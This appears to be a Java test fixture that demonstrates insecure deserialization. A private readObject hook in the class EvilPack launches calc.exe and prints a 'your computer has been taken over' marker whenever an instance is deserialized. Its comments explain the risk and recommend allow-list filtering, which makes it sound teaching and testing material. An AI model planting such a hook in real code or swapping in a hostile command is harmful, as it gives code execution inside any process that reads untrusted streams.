package com.stx.test.serialize.evilPackage;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;

/**
 * packageName com.stx.test.serialize.evilPackage
 *
 * @author YangYi
 * @className EvilPack
 * @date 2025/10/7
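 * @description Demo fixture for insecure Java deserialization: the private readObject hook launches calc.exe as a side effect of an instance being deserialized.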
 */
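public class EvilPack implements Serializable {
    // Demonstration fixture for insecure Java deserialization. Reading an instance
    // of this class from an ObjectInputStream runs the side effect below before the
    // caller ever receives the object, so a type check or cast on the result of
    // readObject() comes too late. Streams from untrusted sources should only be
    // read behind an allow-list (for example an ObjectInputFilter installed on the
    // stream) so that unexpected classes such as this one are rejected up front.
    private static final long serialVersionUID = 1L;

    /**
     * Serialization hook that the Java serialization runtime calls while an
     * instance of this class is being read from a stream.
     *
     * <p>It restores the default fields and then runs the demo side effect. The
     * hook must stay {@code private}, non-static and {@code void} for the runtime
     * to pick it up. It declares the conventional checked exceptions of a
     * {@code readObject} hook instead of a raw {@code Exception}.
     *
     * @param in stream the instance is being read from
     * @throws IOException if reading the default fields fails
     * @throws ClassNotFoundException if a class of a serialized field cannot be found
     */
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        // Stand-in for attacker-chosen code: this runs inside the process that
        // deserializes the stream, with that process's privileges.
        executeMaliciousAction();
    }

    /**
     * Demo side effect: starts the Windows calculator and prints a marker line.
     *
     * @throws RuntimeException wrapping the {@link IOException} if the process
     *     cannot be started (presumably the case on hosts without calc.exe), which
     *     also makes the surrounding deserialization call fail
     */
    private void executeMaliciousAction() {
        try {
            // Launch the calculator as a visible, harmless proof that code ran.
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        // Marker output; the text reads "your computer has been taken over".
        System.out.println("你的电脑被控制了");
    }

}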
